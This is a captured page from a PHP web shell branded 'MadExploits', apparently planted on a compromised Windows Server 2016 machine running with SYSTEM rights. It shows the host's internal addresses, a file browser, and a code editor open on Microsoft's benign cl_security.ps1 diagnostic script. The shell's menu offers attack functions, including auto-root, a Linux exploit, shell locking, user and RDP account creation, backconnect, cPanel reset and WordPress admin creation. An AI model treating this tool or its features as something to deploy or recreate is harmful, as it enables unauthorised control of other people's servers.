Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
Windows /
diagnostics /
system /
WindowsUpdate /
[ HOME SHELL ]
Name
Size
Permission
Action
en-US
[ DIR ]
drwxrwxrwx
CL_Invocation.ps1
1.2
KB
-rw-rw-rw-
DiagPackage.diagpkg
9.06
KB
-rw-rw-rw-
DiagPackage.dll
77
KB
-rw-rw-rw-
RC_DataStore.ps1
605
B
-rw-rw-rw-
RC_DateTime.ps1
4.09
KB
-rw-rw-rw-
RC_appdata.ps1
576
B
-rw-rw-rw-
RES_APPDATA.ps1
281
B
-rw-rw-rw-
RES_GENWUError.ps1
4.91
KB
-rw-rw-rw-
RS_DataStore.ps1
5.31
KB
-rw-rw-rw-
RS_DateTime.ps1
1.73
KB
-rw-rw-rw-
TS_Main.ps1
1.5
KB
-rw-rw-rw-
VF_DataStore.ps1
867
B
-rw-rw-rw-
V_GenWUError.ps1
813
B
-rw-rw-rw-
cl_Service.ps1
7.3
KB
-rw-rw-rw-
cl_mutexverifiers.ps1
17.71
KB
-rw-rw-rw-
cl_security.ps1
37.09
KB
-rw-rw-rw-
cl_windowsupdate.ps1
9.82
KB
-rw-rw-rw-
cl_windowsversion.ps1
20.61
KB
-rw-rw-rw-
rc_genwuerror.ps1
556
B
-rw-rw-rw-
utils_PowerShell_1_0.ps1
6.35
KB
-rw-rw-rw-
utils_SetupEnv.ps1
29.74
KB
-rw-rw-rw-
utils_reporting.ps1
4.07
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cl_security.ps1
# Copyright © 2012, Microsoft Corporation. All rights reserved. #*================================================================================ # REQUIRES PS 1.0 Environment #*================================================================================ . ./utils_SetupEnv.ps1 trap [Exception] { pop-msg ($_); continue; } ##line 13 $IERepairType = import-cs ` -classname Microsoft.Windows.Diagnosis.IERepair ` -sourcefile Security.cs ` -sourcetext @" namespace Microsoft.Windows.Diagnosis { using Environment = System.Environment; using Guid = System.Guid; using GC = System.GC; using IntPtr = System.IntPtr; using UInt32 = System.UInt32; using File = System.IO.File; using FileNotFoundException = System.IO.FileNotFoundException; using Path = System.IO.Path; using System; using System.Collections.Generic; using System.Runtime.InteropServices; using System.Collections; using System.Reflection; using System.Diagnostics; using IDisposable = System.IDisposable; [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] struct ZONEATTRIBUTES { public UInt32 cbSize; [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)] public string szDisplayName; [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 200)] public string szDescription; [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 260)] public string szIconPath; public UInt32 dwTemplateMinLevel; public UInt32 dwTemplateRecommended; public UInt32 dwTemplateCurrentLevel; public UInt32 dwFlags; // ZAFLAGS. }; enum URLZONEREG { URLZONEREG_DEFAULT = 0, URLZONEREG_HKLM, URLZONEREG_HKCU }; enum URLZONE { URLZONE_INVALID = -1, // Invalid Zone. Should only be used if no appropriate zone available. URLZONE_PREDEFINED_MIN = 0, URLZONE_LOCAL_MACHINE = 0, // local machine zone is not exposed in UI URLZONE_INTRANET, // My Intranet zone URLZONE_TRUSTED, // Trusted Web sites zone URLZONE_INTERNET, // The Internet zone URLZONE_UNTRUSTED, // Untrusted sites zone URLZONE_PREDEFINED_MAX = 999, URLZONE_USER_MIN = 1000, URLZONE_USER_MAX = 10000, }; enum tagURLTEMPLATE { // This value is just used to indicate the current set // of policies are not based on any template. URLTEMPLATE_CUSTOM = 0x000000, URLTEMPLATE_PREDEFINED_MIN = 0x10000, URLTEMPLATE_LOW = 0x10000, URLTEMPLATE_MEDLOW = 0x10500, URLTEMPLATE_MEDIUM = 0x11000, URLTEMPLATE_MEDHIGH = 0x11500, URLTEMPLATE_HIGH = 0x12000, URLTEMPLATE_PREDEFINED_MAX = 0x20000 } enum ZAFLAGS { ZAFLAGS_CUSTOM_EDIT = 0x00000001, ZAFLAGS_ADD_SITES = 0x00000002, ZAFLAGS_REQUIRE_VERIFICATION = 0x00000004, ZAFLAGS_INCLUDE_PROXY_OVERRIDE = 0x00000008, // Intranet only. ZAFLAGS_INCLUDE_INTRANET_SITES = 0x00000010, // Intranet only. ZAFLAGS_NO_UI = 0x00000020, // Don't display UI (used for local machine) ZAFLAGS_SUPPORTS_VERIFICATION = 0x00000040, // Supports server verification. ZAFLAGS_UNC_AS_INTRANET = 0x00000080, ZAFLAGS_DETECT_INTRANET = 0x00000100, // Intranet only. // Locked/Unlocked state specific flags. ZAFLAGS_USE_LOCKED_ZONES = 0x00010000, // Used ONLY in GetZoneAttributes to specify that Template Matching should be done to verify // that zone's Current Level is correct. ZAFLAGS_VERIFY_TEMPLATE_SETTINGS = 0x00020000, // Bypass the zonemgr cache for this setting ZAFLAGS_NO_CACHE = 0x00040000, }; [ ComImport, Guid("EDC17559-DD5D-4846-8EEF-8BECBA5A4ABF"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown) ] interface IInternetZoneManagerEx2 { void GetZoneAttributes ( [In] uint dwZone, ref ZONEATTRIBUTES pZoneAttributes ); int SetZoneAttributes ( [In] uint dwZone, ref ZONEATTRIBUTES pZoneAttributes ); void GetZoneCustomPolicy ( [In] uint dwZone, // zone index ref Guid guidKey, // key to lookup value [Out] IntPtr // allocation via IMemAlloc; caller frees ppPolicy, // pointer to output buffer pointer [Out] IntPtr pcbPolicy, // pointer to output buffer size [In] URLZONEREG urlZoneReg // effective, HKCU, or HKLM ); void SetZoneCustomPolicy ( [In] uint dwZone, // zone index ref Guid guidKey, // key to lookup value [In] IntPtr pPolicy, // input buffer pointer [In] uint cbPolicy, // input data size [In] URLZONEREG urlZoneReg // default, HKCU, or HKLM ); int GetZoneActionPolicy ( uint dwZone, // zone index uint dwAction, // index number of action ref uint pPolicy, // output buffer pointer uint cbPolicy, // output buffer size URLZONEREG urlZoneReg // effective, HKCU, or HKLM ); int SetZoneActionPolicy ( uint dwZone, // zone index uint dwAction, // index number of action ref uint pPolicy, // input buffer pointer uint cbPolicy, // input data size URLZONEREG urlZoneReg // HKCU, or HKLM ); // UI, logging, and wrapper for both // This function is not implemented yet. void PromptAction ( [In] uint dwAction, // action type [In] uint hwndParent, // parent window handle [In] string pwszUrl, // URL to display [In] string pwszText, // dialog text [In] uint dwPromptFlags // reserved, pass 0 ); // This method presents UI to ask user about specified action // This function is not implemented. void LogAction ( [In] uint dwAction, // action type [In] string pwszUrl, // URL to log [In] string pwszText, // associated text [In] uint dwLogFlags // reserved, pass 0 ); // zone enumeration int CreateZoneEnumerator ( ref uint pdwEnum, // enum handle ref uint pdwCount, // # of elements in the list. [In] uint dwFlags // reserved, pass 0 ); // Returns enumerator handle needed to enumerate defined zones. // The zone enumeration corresponds to a snap-shot of the zones when // the Create call is made. int GetZoneAt ( [In] uint dwEnum, // returned by CreateZoneEnumerator [In] uint dwIndex, // 0-based ref uint pdwZone // absolute zone index. ); void DestroyZoneEnumerator ( [In] uint dwEnum // enum handle ); // Destroys resources associated with an enumerator void CopyTemplatePoliciesToZone ( [In] uint dwTemplate, // High, medium or low [In] uint dwZone, // Zone to copy policies to. [In] uint dwReserved ); void GetZoneActionPolicyEx ( [In] uint dwZone, // zone index [In] uint dwAction, // index number of action [Out] IntPtr pPolicy, // output buffer pointer [In] uint cbPolicy, // output buffer size [In] URLZONEREG urlZoneReg, // effective, HKCU, or HKLM [In] uint dwFlags //Lockdown Zones or Normal Zones via ZAFLAGS ); void SetZoneActionPolicyEx ( [In] uint dwZone, // zone index [In] uint dwAction, // index number of action [In] IntPtr pPolicy, // input buffer pointer [In] uint cbPolicy, // input data size [In] URLZONEREG urlZoneReg, // HKCU, or HKLM [In] uint dwFlags //Lockdown Zones or Normal Zones via ZAFLAGS ); int GetZoneAttributesEx ( [In] uint dwZone, ref ZONEATTRIBUTES pZoneAttributes, [In] uint dwFlags // can only be ZAFLAGS_VERIFY_TEMPLATE_SETTINGS ); void GetZoneSecurityState ( [In] uint dwZoneIndex, [In] bool fRespectPolicy, ref IntPtr pdwState, ref bool pfPolicyEncountered ); void GetIESecurityState ( [In] bool fRespectPolicy, ref IntPtr pdwState, ref bool pfPolicyEncountered, [In] bool fNoCache ); void FixUnsecureSettings(); } [ComImport, Guid("7b8a2d95-0ac9-11d1-896c-00c04fb6bfc4")] class InternetZoneManagerEx2 { } public class IERepair { private IInternetZoneManagerEx2 coClass = null; uint uZoneEnum; uint uZoneCount; uint URLACTION_LOWRIGHTS = 0x00002500; uint uCurrentPolicy = 0; //current policy for protect mode uint uDefaultPolicy = 0; //default policy for protect mode public IERepair() { coClass = (IInternetZoneManagerEx2)new InternetZoneManagerEx2(); } // This is the "big hammer" function to repair any settings that are not secure. // We will need to define more granular functions that tell us which zones settings were not secure, // and what the unsecure settings were... public Hashtable RepairIESettings() { Hashtable ZoneHash = new Hashtable(); if (coClass != null) { int res = coClass.CreateZoneEnumerator(ref uZoneEnum, ref uZoneCount, 0); if (res == 0) { for (uint i = 0; i < uZoneCount; i++) { uint uZone = 0; ZONEATTRIBUTES zoneatt = new ZONEATTRIBUTES(); res = coClass.GetZoneAt(uZoneEnum, i, ref uZone); if (res == 0) { res = coClass.GetZoneAttributesEx(uZone, ref zoneatt, (uint)ZAFLAGS.ZAFLAGS_VERIFY_TEMPLATE_SETTINGS); if (res == 0) { if (zoneatt.dwTemplateCurrentLevel != zoneatt.dwTemplateRecommended) { zoneatt.dwTemplateCurrentLevel = zoneatt.dwTemplateRecommended; res = coClass.SetZoneAttributes(uZone, ref zoneatt); if (res == 0) { ZoneHash.Add(zoneatt.szDisplayName, zoneatt); } } } } } } } return ZoneHash; } public Hashtable CheckIESettings() { Hashtable ZoneHash = new Hashtable(); if (coClass != null) { int res = coClass.CreateZoneEnumerator(ref uZoneEnum, ref uZoneCount, 0); if (res == 0) { for (uint i = 0; i < uZoneCount; i++) { uint uZone = 0; ZONEATTRIBUTES zoneatt = new ZONEATTRIBUTES(); res = coClass.GetZoneAt(uZoneEnum, i, ref uZone); if (res == 0) { res = coClass.GetZoneAttributesEx(uZone, ref zoneatt, (uint)ZAFLAGS.ZAFLAGS_VERIFY_TEMPLATE_SETTINGS); if (res == 0) { if (zoneatt.dwTemplateCurrentLevel != zoneatt.dwTemplateRecommended) { ZoneHash.Add(zoneatt.szDisplayName, zoneatt); } } } } } } return ZoneHash; } public Hashtable GetIEZones() { Hashtable ZoneHash = new Hashtable(); if (coClass != null) { int res = coClass.CreateZoneEnumerator(ref uZoneEnum, ref uZoneCount, 0); if (res == 0) { for (uint i = 0; i < uZoneCount; i++) { uint uZone = 0; ZONEATTRIBUTES zoneatt = new ZONEATTRIBUTES(); res = coClass.GetZoneAt(uZoneEnum, i, ref uZone); if (res == 0) { res = coClass.GetZoneAttributesEx(uZone, ref zoneatt, (uint)ZAFLAGS.ZAFLAGS_VERIFY_TEMPLATE_SETTINGS); if (res == 0) { ZoneHash.Add(zoneatt.szDisplayName, zoneatt); } } } } } return ZoneHash; } public Hashtable CheckIEProtectMode() { Hashtable ZoneHash = new Hashtable(); if (coClass != null) { int res = coClass.CreateZoneEnumerator(ref uZoneEnum, ref uZoneCount, 0); if (res == 0) { for (uint i = 0; i < uZoneCount; i++) { uint uZone = 0; res = coClass.GetZoneAt(uZoneEnum, i, ref uZone); ZONEATTRIBUTES zoneatt = new ZONEATTRIBUTES(); if (res == 0) { // check the IE protect mode for each zone res = coClass.GetZoneAttributesEx(uZone, ref zoneatt, (uint)ZAFLAGS.ZAFLAGS_VERIFY_TEMPLATE_SETTINGS); if (res == 0) { coClass.GetZoneActionPolicy(uZone, URLACTION_LOWRIGHTS, ref uCurrentPolicy, sizeof(uint), URLZONEREG.URLZONEREG_DEFAULT); coClass.GetZoneActionPolicy(uZone, URLACTION_LOWRIGHTS, ref uDefaultPolicy, sizeof(uint), URLZONEREG.URLZONEREG_HKLM); if (uCurrentPolicy != uDefaultPolicy) { ZoneHash.Add(zoneatt.szDisplayName, uCurrentPolicy); } } } } } } return ZoneHash; } public Hashtable RepairIEProtectMode() { Hashtable ZoneHash = new Hashtable(); if (coClass != null) { int res = coClass.CreateZoneEnumerator(ref uZoneEnum, ref uZoneCount, 0); if (res == 0) { for (uint i = 0; i < uZoneCount; i++) { uint uZone = 0; res = coClass.GetZoneAt(uZoneEnum, i, ref uZone); ZONEATTRIBUTES zoneatt = new ZONEATTRIBUTES(); if (res == 0) { // Repair the IE protect mode for each zone res = coClass.GetZoneAttributesEx(uZone, ref zoneatt, (uint)ZAFLAGS.ZAFLAGS_VERIFY_TEMPLATE_SETTINGS); if (res == 0) { coClass.GetZoneActionPolicy(uZone, URLACTION_LOWRIGHTS, ref uCurrentPolicy, sizeof(uint), URLZONEREG.URLZONEREG_DEFAULT); coClass.GetZoneActionPolicy(uZone, URLACTION_LOWRIGHTS, ref uDefaultPolicy, sizeof(uint), URLZONEREG.URLZONEREG_HKLM); if (uCurrentPolicy != uDefaultPolicy) { res = coClass.SetZoneActionPolicy(uZone, URLACTION_LOWRIGHTS, ref uDefaultPolicy, sizeof(uint), URLZONEREG.URLZONEREG_DEFAULT); ZoneHash.Add(zoneatt.szDisplayName, uDefaultPolicy); } } } } } } return ZoneHash; } } public static class WDManager { [DllImport("Kernel32.dll", SetLastError = true)] private static extern bool SetDllDirectory(string pathName); [DllImport("MpClient.dll", CharSet = CharSet.Unicode)] private static extern uint WDStatus(out bool enabled); [DllImport("MpClient.dll", CharSet = CharSet.Unicode)] private static extern uint WDEnable(bool enable); public static bool IsInstalled() { bool installed = false; try { // #168704 by removing hard coded path name in CL_Security.ps1 string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), "windows defender"); installed = SetDllDirectory(path); } catch (Exception) { } return installed; } public static bool IsEnabled() { bool isEnabled = true; uint result = 0; try { result = WDStatus(out isEnabled); } catch (Exception) //DllNotFoundException { isEnabled = false; } if (result != 0) { isEnabled = false; } return isEnabled; } public static uint SetEnable(bool enable) { uint result = 0; try { //If MSE and Forefront are installed, Windows Defender will be forced to //turn off and this call will take a while to return and it won't succeed. result = WDEnable(enable); } catch (Exception) //DllNotFoundException { } return result; } } public class WDManagerNew : IDisposable { #region static properties private static string _dllPath; public static string DllPath { get { return WDManagerNew._dllPath; } set { WDManagerNew._dllPath = value; } } #endregion #region private private IntPtr _handle; private const int LOAD_WITH_ALTERED_SEARCH_PATH = 0x00000008; [DllImport("kernel32")] private static extern bool FreeLibrary(IntPtr dllPointer); [DllImport("kernel32")] private static extern IntPtr LoadLibraryEx(string dllFilePath, IntPtr hFile, uint dwFlags); [DllImport("kernel32", CharSet = CharSet.Unicode, EntryPoint = "GetProcAddress", SetLastError = true)] public extern static IntPtr GetProcAddress(IntPtr dllPointer, string functionName); private delegate uint WDEnableDelegate(bool pfEnable); private delegate uint WDStatusDelegate(out bool pfEnabled); private WDEnableDelegate _WDEnable; private WDStatusDelegate _WDStatus; #endregion public WDManagerNew() { if (string.IsNullOrEmpty(_dllPath)) { _dllPath = FindLibrary(); } _handle = LoadLibraryEx(_dllPath, IntPtr.Zero, LOAD_WITH_ALTERED_SEARCH_PATH); if (_handle == IntPtr.Zero) { int errno = Marshal.GetLastWin32Error(); string msg = string.Format( "Windows Defender client library gave load error {0} in {1} ", errno, _dllPath); throw new System.IO.FileNotFoundException(msg); } IntPtr proc; proc = GetProcAddress(_handle, "WDEnable"); if (proc == IntPtr.Zero) { int errno = Marshal.GetLastWin32Error(); // string s = Marshal.FormatMessage(); string msg = string.Format( "Proc WDEnable in Windows Defender client library, find returned {0} in {1} ", errno, _dllPath); throw new System.IO.FileNotFoundException(msg); } _WDEnable = (WDEnableDelegate)Marshal.GetDelegateForFunctionPointer(proc, typeof(WDEnableDelegate)); proc = GetProcAddress(_handle, "WDStatus"); if (proc == IntPtr.Zero) { int errno = Marshal.GetLastWin32Error(); // string s = Marshal.FormatMessage(); string msg = string.Format( "Proc WDStatus in Windows Defender client library, find returned {0} in {1} ", errno, _dllPath); throw new System.IO.FileNotFoundException(msg); } _WDStatus = (WDStatusDelegate)Marshal.GetDelegateForFunctionPointer(proc, typeof(WDStatusDelegate)); } // ctor public static string FindLibrary() { string basename = "Windows Defender\\MpClient.dll"; string programdir = Environment.GetEnvironmentVariable("ProgramFiles"); string programdir6432 = Environment.GetEnvironmentVariable("ProgramW6432"); string path; path = string.IsNullOrEmpty(programdir) ? Path.Combine(programdir6432, basename) : Path.Combine(programdir, basename); if (!File.Exists(path)) { throw new FileNotFoundException(); } return path; } // FindLibrary ~WDManagerNew() { Dispose(false); } // dtor #region dispose pattern protected virtual void Dispose(bool disposing) { if (disposing) { // dispose managed resources // Nothing to do! } if (_handle != IntPtr.Zero) { FreeLibrary(_handle); _handle = IntPtr.Zero; } _WDEnable = null; _WDStatus = null; } public void Dispose() { Dispose(true); GC.SuppressFinalize(this); } #endregion public static bool IsEnabled() { bool pfEnabled; WDManagerNew wdm = new WDManagerNew(); uint result = wdm._WDStatus(out pfEnabled); return pfEnabled; } public static void SetEnabled(bool pfEnable) { WDManagerNew wdm = new WDManagerNew(); uint result = wdm._WDEnable(pfEnable); } } // WDManager public static class IEPrivacyMgr { public enum PrivacyType { PRIVACY_TYPE_FIRST_PARTY = 0, // Refers to privacy settings for first party cookies. PRIVACY_TYPE_THIRD_PARTY = 1, // Refers to privacy settings for third party cookies. }; public enum URLZONE { INVALID = -1, // Invalid Zone. Should only be used if no appropriate zone available. PREDEFINED_MIN = 0, // Minimum value for a predefined zone. LOCAL_MACHINE = 0, // local machine zone is not exposed in UI INTRANET, // My Intranet zone TRUSTED, // Trusted Web sites zone INTERNET, // The Internet zone UNTRUSTED, // Untrusted sites zone PREDEFINED_MAX = 999, // Maximum value for a predefined zone USER_MIN = 1000, // Minimum value allowed for a user-defined zone USER_MAX = 10000, // Maximum value allowed for a user-defined zone }; public enum PrivacyTemplate { PRIVACY_TEMPLATE_NO_COOKIES = 0, // Block All Cookies on the Privacy Preferences slider bar PRIVACY_TEMPLATE_HIGH = 1, // High on the Privacy Preferences slider bar PRIVACY_TEMPLATE_MEDIUM_HIGH = 2, // Medium_High on the Privacy Preferences slider bar PRIVACY_TEMPLATE_MEDIUM = 3, // Medium on the Privacy Preferences slider bar PRIVACY_TEMPLATE_MEDIUM_LOW = 4, // Low on the Privacy Preferences slider bar PRIVACY_TEMPLATE_LOW = 5, // Accept All Cookies on the Privacy Preferences slider bar PRIVACY_TEMPLATE_CUSTOM = 100, // User-defined PRIVACY_TEMPLATE_ADVANCED = 101, // User-defined PRIVACY_TEMPLATE_MAX = 5, // Same as PRIVACY_TEMPLATE_LOW }; public enum InternetCookieState { COOKIE_STATE_UNKNOWN = 0x0, COOKIE_STATE_ACCEPT = 0x1, COOKIE_STATE_PROMPT = 0x2, COOKIE_STATE_LEASH = 0x3, COOKIE_STATE_DOWNGRADE = 0x4, COOKIE_STATE_REJECT = 0x5, COOKIE_STATE_MAX = COOKIE_STATE_REJECT, }; [DllImport("wininet.dll", CharSet = CharSet.Unicode)] private static extern uint PrivacyGetZonePreference(URLZONE dwZone, PrivacyType dType, out PrivacyTemplate pwdTemplate, IntPtr szBuffer, out uint pszBufferLength); [DllImport("wininet.dll", CharSet = CharSet.Unicode)] private static extern uint PrivacySetZonePreference(URLZONE dwZone, PrivacyType dType, PrivacyTemplate pwdTemplate, IntPtr szBuffer, uint pszBufferLength); [DllImport("wininet.dll", CharSet = CharSet.Unicode)] private static extern bool InternetEnumPerSiteCookieDecision(string pszSiteName, ref IntPtr pszSiteNameSize, out IntPtr pdwDecision, int dwIndex); [DllImport("wininet.dll", CharSet = CharSet.Unicode)] private static extern bool InternetClearAllPerSiteCookieDecisions(); public static ArrayList GetPrivacySites() { ArrayList privsites = new ArrayList(); bool PerSiteDefined = false; string pszSiteName; int pszSiteNameSize; IntPtr pSNs; IntPtr pdwDecision = new IntPtr(); int i = 0; // Determine if any sites are in the list do { pszSiteName = ""; for (int c = 0; c < 64; c++) { pszSiteName += "\0"; } pszSiteNameSize = (sizeof(char) * pszSiteName.Length); pSNs = new IntPtr(pszSiteNameSize); PerSiteDefined = InternetEnumPerSiteCookieDecision(pszSiteName, ref pSNs, out pdwDecision, i); if (PerSiteDefined == true) { privsites.Add(pszSiteName); } i++; } while (PerSiteDefined == true); return privsites; } public static bool CheckDefault() { bool isDefault = true; bool PerSiteDefined = false; string pszSiteName; int pszSiteNameSize; IntPtr pSNs; IntPtr pdwDecision = new IntPtr(); int i = 0; // Determine if any sites are in the list do { pszSiteName = ""; for (int c = 0; c < 64; c++) { pszSiteName += "\0"; } pszSiteNameSize = (sizeof(char) * pszSiteName.Length); pSNs = new IntPtr(pszSiteNameSize); PerSiteDefined = InternetEnumPerSiteCookieDecision(pszSiteName, ref pSNs, out pdwDecision, i); if (PerSiteDefined == true) { isDefault = false; } i++; } while (PerSiteDefined == true); // Check Slider values uint ReturnValue; uint OutBuffer = 0; PrivacyTemplate pwdTemplate; URLZONE Zonetype; PrivacyType PrivType; PrivType = PrivacyType.PRIVACY_TYPE_FIRST_PARTY; Zonetype = URLZONE.INTERNET; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_MEDIUM) { isDefault = false; } Zonetype = URLZONE.INTRANET; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM) { isDefault = false; } Zonetype = URLZONE.TRUSTED; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM) { isDefault = false; } Zonetype = URLZONE.UNTRUSTED; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_NO_COOKIES) { isDefault = false; } PrivType = PrivacyType.PRIVACY_TYPE_THIRD_PARTY; Zonetype = URLZONE.INTERNET; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_MEDIUM) { isDefault = false; } Zonetype = URLZONE.INTRANET; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM) { isDefault = false; } Zonetype = URLZONE.TRUSTED; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM) { isDefault = false; } Zonetype = URLZONE.UNTRUSTED; ReturnValue = PrivacyGetZonePreference(Zonetype, PrivType, out pwdTemplate, IntPtr.Zero, out OutBuffer); if (pwdTemplate != PrivacyTemplate.PRIVACY_TEMPLATE_NO_COOKIES) { isDefault = false; } return isDefault; } public static void SetDefault() { uint ReturnValue; PrivacyType PrivType; PrivType = PrivacyType.PRIVACY_TYPE_FIRST_PARTY; ReturnValue = PrivacySetZonePreference(URLZONE.INTERNET, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_MEDIUM, IntPtr.Zero, 0); ReturnValue = PrivacySetZonePreference(URLZONE.INTRANET, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM, IntPtr.Zero, 0); ReturnValue = PrivacySetZonePreference(URLZONE.TRUSTED, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM, IntPtr.Zero, 0); ReturnValue = PrivacySetZonePreference(URLZONE.UNTRUSTED, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_NO_COOKIES, IntPtr.Zero, 0); PrivType = PrivacyType.PRIVACY_TYPE_THIRD_PARTY; ReturnValue = PrivacySetZonePreference(URLZONE.INTERNET, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_MEDIUM, IntPtr.Zero, 0); ReturnValue = PrivacySetZonePreference(URLZONE.INTRANET, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM, IntPtr.Zero, 0); ReturnValue = PrivacySetZonePreference(URLZONE.TRUSTED, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_CUSTOM, IntPtr.Zero, 0); ReturnValue = PrivacySetZonePreference(URLZONE.UNTRUSTED, PrivType, PrivacyTemplate.PRIVACY_TEMPLATE_NO_COOKIES, IntPtr.Zero, 0); ClearCookieDecisions(); } public static bool ClearCookieDecisions() { bool ReturnValue = InternetClearAllPerSiteCookieDecisions(); return ReturnValue; } } } "@ ##line 17 $WDManagerType = 'Microsoft.Windows.Diagnosis.WDManager' -as [type] # WDManger is a static class, so object cannot be created # $WDManager = new-object $WDManagerType $result = $WDManagerType::IsInstalled() if (-not $result) { throw "Windows Defender is not installed (missing DLL path)" } $IERepair = new-object $IERepairType $WDManagerNewType = 'Microsoft.Windows.Diagnosis.WDManagerNew' -as [type] $PrivacyMgrType = 'Microsoft.Windows.Diagnosis.IEPrivacyMgr' -as [type] #*================================================================================ #PrivacyMgr #*================================================================================ function PrivacyMgr() { if($?) { return $true } else { return $false } } #*================================================================================ # Get-PrivacySiteList #*================================================================================ function Get-PrivacySiteList() { $SitesList = $PrivacyMgrType::GetPrivacySites() | ForEach-Object {$_.TrimEnd($null)} return $SitesList } #*================================================================================ #Check-PrivacyDefault #*================================================================================ function Check-PrivacyDefault() { return $PrivacyMgrType::CheckDefault() } #*================================================================================ #get item property value from registry property #*================================================================================ function GetItemPropertyValue([string]$reg_path = $(throw "No registry path is specified"), [string]$propertyname = $(throw "no registry path is specified")) { return (Get-ItemProperty $reg_path $propertyname -ErrorAction silentlycontinue) } #*================================================================================ #UnderPolicySetting #*================================================================================ function UnderPolicySetting([string]$name = $(throw "No name is specified"), [string]$registrykey = $(throw "No registrykey is specified")) { $result = $false $userID = ([Security.Principal.WindowsIdentity]::GetCurrent()).user.value.Replace('-', '_') $policysetting = Get-WmiObject -Namespace "root\rsop\user\$userID" -query "select name, registrykey from RSOP_RegistryPolicySetting" | foreach ($_) {if ($_.registryKey -like "*Internet*") {$_}} | Select-Object name, registrykey if($PolicySetting -ne $null) { foreach($policyitem in $policysetting) { if(($policyitem.name -eq $name) -and ($policyitem.registrykey -eq $registrykey)) { return $true } } } $key = get-item "Registry::HKEY_LOCAL_MACHINE\$registrykey" -ErrorAction SilentlyContinue if(@($key.Property) -contains $name) { return $true } return $result } #*================================================================================ #Get-RecursiveACLs #*================================================================================ Function Get-RecursiveACLs($Path) { # Build a collection that will hold the ACLs for each key $Result = @() if(test-path $path){ # Get the ACLs for the supplied key and add them to the result $ACL = Get-Acl $Path $Result += $ACL # Get subkeys of the supplied key foreach ($ChildKeyName in (Get-Item $Path).GetSubKeyNames()) { $Result += Get-RecursiveACLs("$Path\$ChildKeyName") } } # Return the resulting list of ACLs Return $Result } #*================================================================================ #Get-IdentityAccess #*================================================================================ Function Get-IdentityAccess($ACL, $IdentityReference, $RegistryRights) { Foreach ($AccessItem in $ACL.Access) { if($AccessItem -ne $null) { if ($AccessItem.IdentityReference.Tostring().Tolower() -eq $IdentityReference.Tolower()) { if ($AccessItem.RegistryRights.Tostring().tolower() -eq $RegistryRights.Tolower()) { return $true } } } } return $false }
Close
